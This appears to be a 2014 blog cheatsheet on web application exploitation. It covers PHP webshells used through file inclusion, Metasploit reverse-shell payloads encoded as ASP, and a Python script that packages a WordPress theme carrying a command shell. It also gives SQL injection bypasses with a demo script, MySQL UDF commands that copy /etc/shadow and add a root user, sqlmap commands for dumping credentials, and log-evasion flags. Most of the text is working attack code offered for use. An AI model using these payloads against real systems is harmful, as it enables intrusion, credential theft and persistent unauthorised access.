Tuesday, 17 June 2014

Web Application exploitation - a cheatsheet (English)

This is a work in progress. Additions, suggestions and constructive feedback are welcome.
The purpose of these cheatsheets is to, essentially, save time during an attack and study session.

[Last edited:2013-06-18]

WebShell Backdoors
Minimal PHP command shells
file cmd.php: PHP script text =>

or

Example usage via Remote File Include (RFI):
http:///index.php?cmd=&page=http:///cmd.php
A URL-encoded null byte (%00) appended to the included path may also assist in some cases: it truncates whatever suffix the application adds after the supplied path. This only works on PHP versions before 5.3.4, which stopped accepting null bytes in file paths:
http:///index.php?cmd=&page=http:///cmd.php%00

e.g. a Local File Include where the application appends .html to the supplied path:
http:///index.php?system=../../../../../etc/passwd%00.html
Encoding a Windows reverse command shell as ASP
msfpayload windows/shell_reverse_tcp LHOST= LPORT= R | msfencode -t asp -o .asp
Encoding Meterpreter as ASP
msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R | msfencode -t asp -o .asp
(msfpayload and msfencode have since been merged into msfvenom, which takes the same payload names.)
------
attacker msfconsole (the handler must use the same payload, LHOST and LPORT as the encoded file):
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 
set LPORT 
exploit


Reference list of exploitable PHP functions (useful both for writing shells and for reviewing code for them):
http://stackoverflow.com/questions/3115559/exploitable-php-functions


------------------------------------------------------------------------------------------------------------------
Encoding and Decoding - for backdoors, injection, and (de)obfuscation
http://www.asciitohex.com/
http://home.paulschou.net/tools/xlate/
http://www.idea2ic.com/PlayWithJavascript/hexToAscii.html

Burp Suite (Decoder module)
http://portswigger.net/burp/help/decoder.html

Decode base64 from standard input (run the command, paste the encoded text, then press Ctrl-D):
base64 -d

Javascript deobfuscation
http://www.javascriptbeautifier.com/
http://jsbeautifier.org/
http://vitzo.com/en/tools/javascript/javascript-beautifier

------------------------------------------------------------------------------------------------------------------
Specific Web applications
Joomla
Joomla default database configuration filename
/configuration.php
Scanning Joomla! for plugins and versions
/pentest/web/scanners/joomscan/joomscan.pl -u
/pentest/enumeration/web/cms-explorer  -url  -type joomla

WordPress
WordPress default database configuration filename

WordPress default login page
/wp-login.php
WordPress plugins
/wp-content/plugins
Scanning WordPress for plugins and versions
/pentest/web/wpscan/wpscan.rb --url  --proxy  --enumerate [u|p|v|t]

/pentest/enumeration/web/cms-explorer  -url  -type wordpress
Newer WP: "Themes" can be uploaded as zip files by WP administrators, i.e. you:
mkdir wpx
vi wpx/cmd.php
cat wpx/cmd.php

zip -r wpx.zip wpx
upload wpx.zip via the web interface as a theme
Command execution access is then via the theme's directory (uploaded themes are extracted under /wp-content/themes/, not /wp-content/plugins/):
/wp-content/themes/wpx/cmd.php?cmd=
Older WP: Webshells can be added by editing existing files/themes via the web interface, or by enabling file upload and permitting the required file extension (e.g. .php)
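The theme-zip steps above, written out as an added Python script (not code from the original cheatsheet) that builds the archive with the zipfile module instead of vi and zip. The directory name wpx, the file name cmd.php and the one-line PHP shell are chosen here for illustration; a style.css with a "Theme Name:" header is included because the WordPress theme uploader rejects an archive that lacks one.

```python
"""Build a WordPress theme zip that carries a PHP command shell.

Added example, not from the original cheatsheet. Directory name, file
names and the shell body are illustrative choices, not page content."""
import io
import zipfile

THEME_DIR = "wpx"  # hypothetical theme directory name

# Minimal PHP command shell: runs the "cmd" query parameter through system().
# The original page's shell text was not preserved; this one is an assumption.
CMD_PHP = "<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>\n"

# WordPress refuses a theme upload without style.css carrying a Theme Name header.
STYLE_CSS = """/*
Theme Name: wpx
Description: placeholder header so the theme uploader accepts the archive
Version: 0.1
*/
"""


def build_theme_zip():
    """Return the zip bytes: one top-level directory holding style.css and cmd.php."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(THEME_DIR + "/style.css", STYLE_CSS)
        zf.writestr(THEME_DIR + "/cmd.php", CMD_PHP)
    return buf.getvalue()


def zip_members(zip_bytes):
    """Sorted member names, used to check the layout before uploading."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return sorted(zf.namelist())


def shell_path(zip_bytes):
    """Where the shell lands once installed: themes are extracted under
    /wp-content/themes/<dir>/, so the web path mirrors the zip path."""
    php = [n for n in zip_members(zip_bytes) if n.endswith(".php")]
    return "/wp-content/themes/" + php[0]


if __name__ == "__main__":
    data = build_theme_zip()
    with open("wpx.zip", "wb") as f:
        f.write(data)
    print("members:", zip_members(data))
    print("shell URL path:", shell_path(data) + "?cmd=id")
```

Upload the resulting wpx.zip through the theme installer; the shell is then reachable at the path printed by the script, with the command in the cmd parameter.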

Cacti
Cacti default database configuration filename
/include/config.php


DeV!L`z ClanPortal
DeV!L`z ClanPortal default database configuration filename
/inc/mysql.php

Drupal
Drupal default database configuration filename
/sites/default/settings.php

Scanning Drupal for plugins and versions
/pentest/enumeration/web/cms-explorer  -url  -type drupal
phpMyAdmin (the bundled changelog discloses the installed version)
/phpmyadmin/changelog.php
Timeclock
Timeclock default database configuration filename
/db.php


Default files to check for additional paths
<target-webpath>/robots.txt
<target-webpath>/style.css

------------------------------------------------------------------------------------------------------------------
SQL Terminators/Comments
MSSQL and MySQL:
;--
MySQL:
;#
(MySQL only treats -- as a comment when whitespace follows it; in a URL write it as "--+" or "-- -" so the space survives. # needs no trailing space.)


Login Pages Basic SQL injection 
MS IIS (MSSQL backend)
' OR '1'='1';--

MySQL
' OR 1=1;-- -
' OR 1=1;#
' OR 1=1 LIMIT 1;#

Enumerate number of columns/fields (add one column per attempt until the column-count error disappears; NULL works as a filler for any column type)
...UNION SELECT 1;--
...UNION SELECT 1,2;--
...UNION SELECT 1,2,3;--

Load file by injecting into the vulnerable field - encode the string if necessary (MySQL; the database user needs the FILE privilege)
...UNION ALL SELECT NULL,LOAD_FILE(''),NULL,NULL;--
...UNION ALL SELECT NULL,LOAD_FILE(''),NULL,NULL INTO OUTFILE '';--

Dump/Write to file (same FILE privilege; the target directory must be writable by the mysqld process)
(see encode text/shell to hex, base64)
...SELECT * FROM mytable INTO DUMPFILE '';--
...SELECT * FROM mytable INTO OUTFILE '';--

http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku
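As an added, runnable illustration of the login bypass and the UNION column-count trick above, here is a small Python script that is not part of the original cheatsheet. It runs offline against an in-memory SQLite database standing in for MySQL; the users and products tables, their rows and the vulnerable query shapes are constructed for the example. SQLite honours the -- terminator used above (the MySQL-only # terminator, LOAD_FILE and INTO OUTFILE have no SQLite equivalent and are left out).

```python
"""SQL injection against a deliberately vulnerable login and product lookup.

Added example, not code from the original cheatsheet. Runs against an
in-memory SQLite database (a stand-in for MySQL); all tables, rows and
query shapes below are constructed for illustration."""
import sqlite3


def build_db():
    """Constructed sample data: two users and two products."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cr3t'), (2, 'bob', 'hunter2');
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1, 'widget', 9.99), (2, 'gadget', 19.99);
    """)
    return conn


def vulnerable_login(conn, username, password):
    """Vulnerable: user input is concatenated straight into the SQL text,
    so ' OR 1=1-- turns the WHERE clause into (... AND ...) OR 1=1."""
    sql = ("SELECT username FROM users WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Fixed: a parameterised query; the driver never parses input as SQL."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None


def vulnerable_product(conn, name):
    """Vulnerable three-column lookup used for the UNION examples."""
    sql = "SELECT id, name, price FROM products WHERE name='" + name + "'"
    return conn.execute(sql).fetchall()


def count_columns(conn, max_cols=10):
    """Enumerate the column count the way the cheatsheet does: append
    UNION SELECT 1 / 1,2 / 1,2,3 ... until the column-count error goes away."""
    for n in range(1, max_cols + 1):
        cols = ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_product(conn, "' UNION SELECT " + cols + "--")
            return n  # no error: the UNION matched the query's column count
        except sqlite3.OperationalError:
            continue  # column count mismatch: try one more column
    return None


def dump_users(conn):
    """With the column count known, UNION the users table into the result."""
    rows = vulnerable_product(
        conn, "' UNION SELECT id, username, password FROM users--")
    return set(rows)


if __name__ == "__main__":
    db = build_db()
    print("password bypass:", vulnerable_login(db, "admin", "' OR 1=1--"))
    print("username bypass:", vulnerable_login(db, "' OR 1=1 LIMIT 1--", "x"))
    print("parameterised:", safe_login(db, "admin", "' OR 1=1--"))
    print("columns:", count_columns(db))
    print("users:", dump_users(db))
```

The same loop is what sqlmap automates with --union-cols; doing it by hand once makes the error-driven probing in its output easier to read.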

MySQL <5.0 User Defined Functions (UDF)
command execution and privilege escalation with mysql running as root/SYSTEM (the database account also needs the FILE privilege to write the library; on MySQL 5.1 and later the .so must be written into the directory given by @@plugin_dir rather than /usr/lib)
mysql> use mysql;
mysql> create table  (line blob);
Query OK, 0 rows affected (0.00 sec)
mysql> insert into  values(load_file(''));
Query OK, 1 rows affected (0.00 sec)
mysql> select * from  into dumpfile '/usr/lib/lib_mysqludf_sys.so';
Query OK, 1 rows affected (0.00 sec)
mysql> create function  returns int soname 'lib_mysqludf_sys.so';
Example command execution with the new function:
mysql> set @status := ('cat /etc/shadow > /tmp/shadow');
Query OK, 0 rows affected (0.06 sec)
mysql> set @status := ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash <new-username>');
Query OK, 0 rows affected (0.06 sec)
mysql> set @status := ('echo : | /usr/sbin/chpasswd');
Query OK, 0 rows affected (0.06 sec)
or
mysql> select ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash <new-username>');
+---------------------------------------------------------------------------+
| ('/usr/sbin/useradd -o -u0 -g0 -d /dev/null -s /bin/bash <new-username>') |
+---------------------------------------------------------------------------+
| 4294967296                                                                |
+---------------------------------------------------------------------------+
1 row in set (1.70 sec)
SQLMap commands


cd /pentest/database/sqlmap
Retrieve SQL Banner, current database and current user; test if the user is the db administrator
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" -p --banner --current-db --current-user --is-dba

Enumerate User Passwords
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --passwords

List of Databases
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --dbs

Retrieve tables from specific Database
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --tables -D

Dump specific table contents
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --dump -D -T

Retrieve the system /etc/passwd file (file reads need the FILE privilege on MySQL, so check --is-dba first)
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/passwd

Retrieve apache2 configuration file to identify live website config files
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/apache2/apache2.conf

Retrieve the default site configuration file to identify the DocumentRoot (web directory location)
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=/etc/apache2/sites-enabled/000-default

Retrieve CMS/Web app default configuration file if possible
./sqlmap.py -u "http:///index.php?param1=1&param2=2&param3=3" --file-read=//


Other interesting flags:
--check-waf         Check for existence of WAF/IPS/IDS protection (implementation of the nmap http-waf-detect NSE script)

Some logfile misdirection flags:
--random-agent      Use a randomly selected HTTP User-Agent header
--safe-url=SAFEURL  URL to visit frequently during testing
--safe-freq=SAFEFREQ  Number of test requests between two visits to the safe URL
--mobile            Imitate a smartphone through the HTTP User-Agent header

------------------------------------------------------------------------------------------------------------------

Basic Client-side attacks
XSS - iframe



XSS - javascript




References and sources also include:
http://g0tmi1k.blogspot.com
http://ha.ckers.org/sqlinjection/

Source: http://it-ovid.blogspot.com/2012/04/web-application-exploitation-cheatsheet.html
